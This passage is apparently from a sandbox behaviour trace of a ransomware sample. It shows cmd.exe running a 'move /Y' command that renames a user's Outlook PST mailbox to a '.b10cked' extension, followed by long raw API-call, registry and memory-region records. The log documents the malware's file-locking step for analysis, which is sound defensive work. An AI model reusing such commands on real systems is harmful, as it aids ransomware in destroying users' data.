lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.119] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.119] ReadFile (in: hFile=0x54, lpBuffer=0x2eeea0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee090, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesRead=0x2ee090*=0x32, lpOverlapped=0x0) returned 1 [0237.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.119] GetFileType (hFile=0x4c) returned 0x1 [0237.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.119] GetFileType (hFile=0x4c) returned 0x1 [0237.119] _get_osfhandle (_FileHandle=1) returned 0x4c [0237.119] WriteFile (in: hFile=0x4c, lpBuffer=0x2eeea0*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ee084, lpOverlapped=0x0 | out: lpBuffer=0x2eeea0*, lpNumberOfBytesWritten=0x2ee084*=0x32, lpOverlapped=0x0) returned 1 [0237.119] _get_osfhandle (_FileHandle=4) returned 0x54 [0237.119] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee070 | out: lpNewFilePointer=0x0) returned 1 [0237.119] _close (_FileHandle=4) returned 0 [0237.119] FindNextFileW (in: hFindFile=0x3d0e50, lpFindFileData=0x2ef104 | out: lpFindFileData=0x2ef104) returned 0 [0237.120] GetLastError () returned 0x12 [0237.120] FindClose (in: hFindFile=0x3d0e50 | out: hFindFile=0x3d0e50) returned 1 [0237.120] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0237.120] _close (_FileHandle=3) returned 0 [0237.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.121] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0237.121] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.121] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1 [0237.121] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.121] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1 [0237.121] SetConsoleInputExeNameW () returned 0x1 [0237.121] GetConsoleOutputCP () returned 0x1b5 [0237.121] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0237.121] SetThreadUILanguage (LangId=0x0) returned 0x409 [0237.121] exit (_Code=0) Process: id = "652" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d60" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35850 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35851 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35852 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35853 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 35854 start_va = 0x4a830000 end_va = 0x4a87bfff entry_point = 0x4a830000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35855 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35856 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35857 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35858 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 35859 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35880 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35881 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35882 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35883 start_va = 0x100000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 35884 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 35885 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35886 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35887 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35888 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35889 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35890 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35891 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35892 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35893 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35894 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 35895 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35896 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35897 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35898 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35899 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35900 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35901 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 35902 start_va = 0x510000 end_va = 0x110ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 35903 start_va = 0x1110000 end_va = 0x1272fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Thread: id = 893 os_tid = 0x170 [0237.403] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30faec | out: lpSystemTimeAsFileTime=0x30faec*(dwLowDateTime=0xc0f6f600, dwHighDateTime=0x1d440a9)) [0237.403] GetCurrentProcessId () returned 0xa70 [0237.403] GetCurrentThreadId () returned 0x170 [0237.403] GetTickCount () returned 0x411da [0237.403] QueryPerformanceCounter (in: lpPerformanceCount=0x30fae4 | out: lpPerformanceCount=0x30fae4*=29419243510) returned 1 [0237.404] GetModuleHandleA (lpModuleName=0x0) returned 0x4a830000 [0237.404] __set_app_type (_Type=0x1) [0237.404] __p__fmode () returned 0x76b331f4 [0237.404] __p__commode () returned 0x76b331fc [0237.404] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8521a6) returned 0x0 [0237.404] __getmainargs (in: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c, _DoWildCard=0, _StartInfo=0x4a854140 | out: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c) returned 0 [0237.404] GetCurrentThreadId () returned 0x170 [0237.404] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x170) returned 0x38 [0237.404] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0237.404] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0237.404] SetThreadUILanguage (LangId=0x0) returned 0x409 [0237.405] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0237.405] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fa7c | out: phkResult=0x30fa7c*=0x0) returned 0x2 [0237.405] VirtualQuery (in: lpAddress=0x30fab3, lpBuffer=0x30fa4c, dwLength=0x1c | out: lpBuffer=0x30fa4c*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0237.405] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30fa4c, dwLength=0x1c | out: lpBuffer=0x30fa4c*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0237.405] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30fa4c, dwLength=0x1c | out: lpBuffer=0x30fa4c*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0237.405] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30fa4c, dwLength=0x1c | out: lpBuffer=0x30fa4c*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0237.405] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30fa4c, dwLength=0x1c | out: lpBuffer=0x30fa4c*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0237.405] GetConsoleOutputCP () returned 0x1b5 [0237.405] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0237.405] SetConsoleCtrlHandler (HandlerRoutine=0x4a84e72a, Add=1) returned 1 [0237.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.405] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0237.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.405] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1 [0237.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.406] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0237.406] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.406] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1 [0237.406] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.406] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0237.406] GetEnvironmentStringsW () returned 0x1101a8* [0237.406] FreeEnvironmentStringsW (penv=0x1101a8) returned 1 [0237.406] GetEnvironmentStringsW () returned 0x1101a8* [0237.406] FreeEnvironmentStringsW (penv=0x1101a8) returned 1 [0237.406] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e9ec | out: phkResult=0x30e9ec*=0x40) returned 0x0 [0237.406] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x0, lpData=0x30e9f8*=0xd0, lpcbData=0x30e9f0*=0x1000) returned 0x2 [0237.406] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x1, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.406] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x0, lpData=0x30e9f8*=0x1, lpcbData=0x30e9f0*=0x1000) returned 0x2 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x0, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x40, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x40, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x0, lpData=0x30e9f8*=0x40, lpcbData=0x30e9f0*=0x1000) returned 0x2 [0237.407] RegCloseKey (hKey=0x40) returned 0x0 [0237.407] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e9ec | out: phkResult=0x30e9ec*=0x40) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x0, lpData=0x30e9f8*=0x40, lpcbData=0x30e9f0*=0x1000) returned 0x2 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x1, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x0, lpData=0x30e9f8*=0x1, lpcbData=0x30e9f0*=0x1000) returned 0x2 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x0, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x9, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x4, lpData=0x30e9f8*=0x9, lpcbData=0x30e9f0*=0x4) returned 0x0 [0237.407] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e9f4, lpData=0x30e9f8, lpcbData=0x30e9f0*=0x1000 | out: lpType=0x30e9f4*=0x0, lpData=0x30e9f8*=0x9, lpcbData=0x30e9f0*=0x1000) returned 0x2 [0237.407] RegCloseKey (hKey=0x40) returned 0x0 [0237.407] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c5 [0237.407] srand (_Seed=0x5b8863c5) [0237.407] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked\"" [0237.407] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked\"" [0237.407] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0237.408] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x111908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0237.408] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0237.408] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0237.408] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0237.408] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0237.408] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0237.408] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0237.408] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0237.408] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0237.408] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0237.408] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0237.408] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0237.408] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0237.408] GetEnvironmentStringsW () returned 0x1122f8* [0237.408] FreeEnvironmentStringsW (penv=0x1122f8) returned 1 [0237.408] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0237.408] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0237.408] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0237.408] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0237.408] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0237.408] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0237.408] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0237.408] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0237.408] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0237.408] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0237.408] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f7b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0237.409] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f7b8, lpFilePart=0x30f7b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f7b4*="Desktop") returned 0x18 [0237.409] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0237.409] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f534 | out: lpFindFileData=0x30f534) returned 0x110038 [0237.409] FindClose (in: hFindFile=0x110038 | out: hFindFile=0x110038) returned 1 [0237.409] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f534 | out: lpFindFileData=0x30f534) returned 0x110038 [0237.409] FindClose (in: hFindFile=0x110038 | out: hFindFile=0x110038) returned 1 [0237.409] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f534 | out: lpFindFileData=0x30f534) returned 0x110038 [0237.409] FindClose (in: hFindFile=0x110038 | out: hFindFile=0x110038) returned 1 [0237.409] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0237.409] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0237.409] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0237.409] GetEnvironmentStringsW () returned 0x112b18* [0237.410] FreeEnvironmentStringsW (penv=0x112b18) returned 1 [0237.410] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0237.410] GetConsoleOutputCP () returned 0x1b5 [0237.410] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0237.410] GetUserDefaultLCID () returned 0x409 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a854950, cchData=8 | out: lpLCData=":") returned 2 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f8f8, cchData=128 | out: lpLCData="0") returned 2 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f8f8, cchData=128 | out: lpLCData="0") returned 2 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f8f8, cchData=128 | out: lpLCData="1") returned 2 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a854940, cchData=8 | out: lpLCData="/") returned 2 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a854d80, cchData=32 | out: lpLCData="Mon") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a854d40, cchData=32 | out: lpLCData="Tue") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a854d00, cchData=32 | out: lpLCData="Wed") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a854cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a854c80, cchData=32 | out: lpLCData="Fri") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a854c40, cchData=32 | out: lpLCData="Sat") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a854c00, cchData=32 | out: lpLCData="Sun") returned 4 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a854930, cchData=8 | out: lpLCData=".") returned 2 [0237.411] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a854920, cchData=8 | out: lpLCData=",") returned 2 [0237.411] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0237.412] GetConsoleTitleW (in: lpConsoleTitle=0x1008f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0237.412] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0237.412] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0237.412] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0237.412] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0237.413] _wcsicmp (_String1="move", _String2=")") returned 68 [0237.413] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0237.413] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0237.413] _wcsicmp (_String1="IF", _String2="move") returned -4 [0237.413] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0237.413] _wcsicmp (_String1="REM", _String2="move") returned 5 [0237.413] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0237.416] GetConsoleTitleW (in: lpConsoleTitle=0x30f5f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0237.416] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0237.416] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0237.416] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0237.416] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0237.416] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0237.416] _wcsicmp (_String1="move", _String2="CD") returned 10 [0237.416] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0237.416] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0237.416] _wcsicmp (_String1="move", _String2="REN") returned -5 [0237.416] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0237.416] _wcsicmp (_String1="move", _String2="SET") returned -6 [0237.416] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0237.416] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0237.416] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0237.416] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0237.416] _wcsicmp (_String1="move", _String2="MD") returned 11 [0237.416] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0237.416] _wcsicmp (_String1="move", _String2="RD") returned -5 [0237.416] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0237.416] _wcsicmp (_String1="move", _String2="PATH") returned -3 